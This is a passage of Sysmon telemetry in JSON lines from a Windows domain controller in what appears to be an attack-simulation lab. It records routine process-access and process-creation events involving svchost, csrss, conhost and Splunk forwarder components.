C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:41.360","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4244,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:41.360\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20B1-5F25-0000-0010B94D0600}\r\nTargetProcessId: 2220\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:41.360","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20B1-5F25-0000-0010B94D0600}","TargetProcessId":"2220","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4245,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:41.501\r\nSourceProcessGUID: {41C8662E-20B1-5F25-0000-0010B94D0600}\r\nSourceProcessId: 2220\r\nSourceThreadId: 5048\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:41.501","SourceProcessGUID":"{41C8662E-20B1-5F25-0000-0010B94D0600}","SourceProcessId":"2220","SourceThreadId":"5048","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4246,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:42.033\r\nProcessGuid: {41C8662E-20B2-5F25-0000-0010904F0600}\r\nProcessId: 4420\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:42.033","ProcessGuid":"{41C8662E-20B2-5F25-0000-0010904F0600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4247,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:42.032\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-20B2-5F25-0000-0010904F0600}\r\nTargetProcessId: 4420\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:42.032","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-20B2-5F25-0000-0010904F0600}","TargetProcessId":"4420","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4248,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:42.032\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20B2-5F25-0000-0010904F0600}\r\nTargetProcessId: 4420\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:42.032","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20B2-5F25-0000-0010904F0600}","TargetProcessId":"4420","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4249,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:42.032\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:42.032","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4250,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:42.032\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:42.032","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4251,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:42.032\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:42.032","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
